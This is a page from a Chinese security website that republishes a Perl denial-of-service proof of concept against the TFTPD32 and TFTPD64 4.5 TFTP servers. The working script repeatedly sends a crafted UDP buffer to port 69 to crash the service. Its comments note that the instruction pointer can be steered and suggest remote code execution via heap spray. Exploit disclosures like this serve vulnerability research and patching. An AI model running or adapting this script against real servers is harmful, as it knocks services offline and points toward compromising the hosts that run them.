首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC
来源:vfocus.net 作者:j0s3h4x0r 发布时间:2014-05-15  
# Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc
# Date: 13/05/2014
# Exploit Author: j0s3h4x0r
# Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html
# Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip
# Version: 4.5 32 bits / 4.5 64 bits
# Tested on: [Windows 7 x64]
  
#this proof of concept code will crash tftpd32 and tftpd64
#you can try changing $j and $i loop limits
#most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs
#and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray
  
## Exploit-DB Note: $j=5, $i=2500 caused a crash. 
  
  
  
#!/usr/bin/perl -w
  
use IO::Socket;
  
for (my $j = 0; $j < 2; $j++)
{
    sleep(2);
    for (my $i = 0; $i < 1500; $i++)
    {
        $st_socket = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
      
        $p_c_buffer = "\x0c\x0d" x 10;
      
        print $st_socket $p_c_buffer;
      
        close($st_socket);
  
        print "sent " . $i . "\n";
    }
}
  
exit;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy File Sharing Web Server 6
·Linux Kernel 3.15-rc4 PTY Race
·K-Lite CODEC 10.45 Memory Corr
·WordPress Formidable Forms Rem
·ElasticSearch Remote Code Exec
·Linux Kernel 3.3-3.8 - SOCK_DI
·Wireshark 1.10.7 - DoS PoC
·AlienVault OSSIM 4.6.1 - Authe
·Mozilla Firefox 29.0 - Null Po
·Easy Chat Server 3.1 - Stack B
·WinAMP 5.666 Memory Corruption
·Yokogawa CS3000 BKESimmgr.exe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved